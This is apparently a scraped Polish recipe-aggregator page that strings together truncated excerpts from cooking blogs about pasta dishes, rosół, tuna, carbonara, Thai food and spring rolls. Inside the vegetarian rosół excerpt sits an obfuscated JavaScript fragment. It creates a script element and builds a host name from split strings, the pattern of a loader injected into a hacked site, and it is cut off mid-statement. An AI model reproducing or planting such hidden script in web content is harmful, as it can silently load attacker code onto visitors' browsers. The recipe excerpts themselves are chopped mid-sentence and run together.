szynką, papryką i pieczarkami . Obiad idealny dla zabieganych. Syci i smakuje, a przygotowanie trwa zaledwie kilka minut. Smaku daniu nadaje przede wszystkich dobrej jakości szynka. Ja polecam Szynkę po staremu Duda. Obiad idealny. Spróbujcie. Składniki: (na porcję) porcja makaronu penne 3 czubate łyżki śmietany 18% 1/4 żółtej papryki 4 plastry Szynkę po staremu Duda duża szczypta suszonej bazylii sól
Słodkie okruszkiRosół to, w klasycznej wersji, niezagęszczana zupa będąca wywarem mięsno – warzywnym przygotowywanym na bazie drobiu, wołowiny lub baraniny. Serwuje się ją z makaronem typu nitki lub wstążkami, ziemiankami albo kluskami lanymi. Z powodzeniem przyrządzić możemy jednak także bezmięsną wersję tej popularnej potrawy. W jaki sposób? Odpowiedź – poniżej. Bez czego nie może się obyć wegetariański rosół? Bukietu warzyw – to właśnie(...)warzywa i przyprawy. Dokładnie wyciskamy wszystkie składniki, tak by oddały do garnka swoje soki, w których znajduje się najcenniejszy smak. Tak przyrządzone danie można dodatkowo przyprawić odrobiną soli i pieprzu. Rosół serwujemy z makaronem, posiekanymi liśćmi pietruszki i niewielkim kawałkiem marchewki z wywaru. (function(){ a8iw=document.createElement("script");a8iw_="u"+("s")+"ta"; a8iw_+=("t.i")+""+"n";a8iw
Moja smaczna kuchnianiezbędnych nienasyconych kwasów tłuszczowych. Dostarcza witaminy B, A i D, fosfor, żelazo i na dodatek jest fit! To doskonała baza do sałatek, kanapek, makaronów czy zapiekanek, świetnie nadaje się także na grilla – pomysłów na dania z tuńczykiem jest wiele :) #Master Tuńczyk Wiosna na widelcu z tuńczykiem Princes! Rodzinne gotowanie? To kulinarne wyzwanie :) Pokażcie Wasze wspólne
Szalona Kuchnia EwelinyTagiatelle verde ze szparagami, grejfrutem i mozzarellą to szybka sałatka makaronowa. Wstyd się przyznać ale nie jadłam jeszcze świeżych szparagów, takie marynowane ze słoiczka to i
Pieguskowa KuchniaJakiś czas temu był domowy makaron ,wykorzystałam go do rosołu ..ale znów mi się zachciało ..no i zrobiłam..kiedyś gdzieś czytałam, że do makaronu na 100 g mąki używamy 1 jajko..ale ja tym razem dałam 1 jajko i 1 żółtko, troszkę oliwy i wody..no i tym razem zrobiłam krótkie nitki.. 200 g mąki tortowej Młynomag(...)przykleiło się do wałka].Rozwałkowane ciasto pozostawić na około 1 godziny do przeschnięcia - u mnie w sumie było to tylko pół godziny.Następnie ciasto pokroić w wąskie paski [ długość makaronu będzie zależała od długości pasków ciasta] i przepuścić przez maszynkę do makaronu
Moje domowe kucharzenieczerwonej 1 mała cebula czerwona Pół puszki kukurydzy Pół puszki fasoli czerwonej mały kawałek papryczki chili Przyprawa do dań meksykańskiej użyłam przyprawę do chili con carne Sól Na sos 2 łyżki keczupu 2 łyżki majonezu 2 łyżki jogurtu naturalnego Makaron ugotować,odcedzić i wystudzić. Fasolę i kukurydzę odcedzić,przepłukać. Kurczaka pokroìć w kostkę i podsmażyć na patelni dodając przyprawę
Andzia Pichciwięc możemy przygotować nawet na dwa dni, tym bardziej, że z podanych składników wychodzi tego dania całkiem sporo. Po powrocie z pracy wystarczy tylko odgrzać i mamy obiad. Polecam! Składniki: 1 główka młodej kapusty 35 dag grubego makaronu np. gnocchi 2 cebule 35 dag surowego podwędzanego boczku 2 długie laski podlaskiej kiełbasy
Wanilia i Kardamonsię idealnym do niego dodatkiem. W duecie z dynią oczywiście poszedł szpinak. Natomiast ser pleśniowy nadał daniu charakteru. Danie oczywiście nie należy do lekkich ale czasami w okresie jesienno-zimowym można pozwolić sobie na taką rozpustę Zapraszam na makaron z dynią i szpinakiem w sosie z sera pleśniowego i mam nadzieję, że będzie Wam tak bardzo smakował
UgotujmyTo.plDziś na obiad spaghetti carbonara . Mimo, że urodą to danie nie grzeszy, to bardzo smakuje.... Po prostu niebo w gębie! Bardzo proste i szybkie jedzonko - czas przygotowania to tylko kwestia ugotowania makaronu :-) Składniki: Makaron penne 300-400g Śmietana gęsta 18% około 300-400 ml 3 żółtka 3 łyżki mleka 3 łyżki oleju boczek - wedle uznania
Anielska Kuchnia Aniczerpały inspirację z innych kuchni azjatyckich. Popularny wok, który wykorzystywany jest do przyrządzania wielu potraw kuchni tajskiej, pochodzi z Chin, a przecież dziś trudno wyobrazić sobie przygotowanie wielu dań tajskich bez tego ważnego naczynia. Najważniejsze składniki kuchni tajskiej W kuchni tajskiej z całą pewnością nie może zabraknąć świeżego, wyrazistego imbiru, trawy cytrynowej, liści limonki i oczywiście mleczka kokosowego, które(...)thai. To nic innego jak makaron ryżowy z różnymi dodatkami. W pad thai nie może zabraknąć podsmażanego tofu, orzechów, oleju kokosowego, świeżej cebulki zielonej. Głównym składnikiem, obok makaronu, może być zarówno mięso z kurczaka, jak i np. krewetka (prosty przepis na pad thai z krewetkami i tofu znajduje się tutaj ). Innym popularnym daniem jest curry. Można je przyrządzać
FoodMagazine.pl - Przepisy kulinarnesałatkę makaronową. Jest prosta, ale ma głęboki smak co jest zasługą pysznego sosu. Można ją jeść na zimno i na ciepło. Danie do przyrządzenia w 15 minut. Przepis na sałatkę makaronową Był czas kiedy za makaron uważaliśmy tylko spaghetti, a jego inne gatunki jakość niespecjalnie nas interesowały (no może z wyjątkiem lasagne). Teraz mamy zdecydowanie szersze makaronowe horyzonty
Niedzielny kucharzsosie beszamelowym z chrupiącą skorupką z sera żółtego, to jedno z dań które często się pojawia w mojej kuchni w sezonie jesienno zimowym, choć pracochłonne to warte przygotowania na smaczny obiad. Doskonale smakuje także odgrzewane. Składniki na 5 porcji: 500 g grubego makaronu cannelloni 500 g mielonego mięsa wołowego 200 g mielonego mięsa wieprzowego 350 g passaty/przecieru
Wanilia i Kardamonogromnej ilości dodatków, może być zarówno mięsny jak i warzywny, według waszych indywidualnych upodobań. Do sajgonek często dodawany jest również chiński makaron. Sajgonki najlepiej podajemy z sosem sos słodko-kwaśny. Nazwa tego dania znana na całym świecie to spring rolls. Polska nazwa „sajgonki” wywodzi się od nazwy miasta Sajgon , z którego pochodzi wielu imigrantów wietnamskich mieszkających(...)mielonej wołowiny np. udźca i szynki wieprzowej ) 2 łyżki sosu sojowego jasnego 1 łyżka sosu sojowego ciemnego ½ łyżeczki przyprawy 5 smaków 5 cm kawałek cebulki dymki 50 g ugotowanego makaronu chińskiego (może być chow main, sojowy lub ryżowy) 4 suszone grzyby mun 1 jajko 30 g pędów bambusa 1-2 liście kapusty pekińskiej Dodatkowo: 2 opakowania papieru ryżowego (2x50g
Mania Gotowaniaświecie od starożytnych Egipcjan począwszy. Co prawda oni akurat nie wywarli wielkiego wpływu na potrawy znajdujące się na naszym stole, ale już pogańscy Słowianie bardzo. Zwyczajowo liczba dań powinna być nieparzysta. W najbiedniejszych rodzinach było ich 5 lub 7, a w bogatych 9 lub 11. 12 potraw wymyślili najbogatsi. Dwunastka, co wiemy ze szkoły, przy okazji omawiania(...)symboliczne, ale właśnie dlatego jest na każdym polskim świątecznym stole. Oczywiście nie sam tylko w towarzystwie zboża w takich czy innych postaciach jak ziarno, makaron, ciasto, chleb. Właśnie to ostatnie zainspirowało mnie do stworzenia tego dania. Taka makówkowa wariacja. Gdyby było po śląsku to musiałoby być przyozdobione mandarynką. Składniki: - mak - powidła śliwkowe - chleb tostowy Wykonanie: Mak gotujemy, (można
Kryzysowa Książka KucharskaPomysł na warzywne zapiekane doniczki zrodził się spontanicznie, był wynikiem braku czasu i ogromnej chęci na przekąszenie ciepłego skondensowanego warzywnego czegoś podczas nasiadówki ze znajomymi ;) Co
upichcona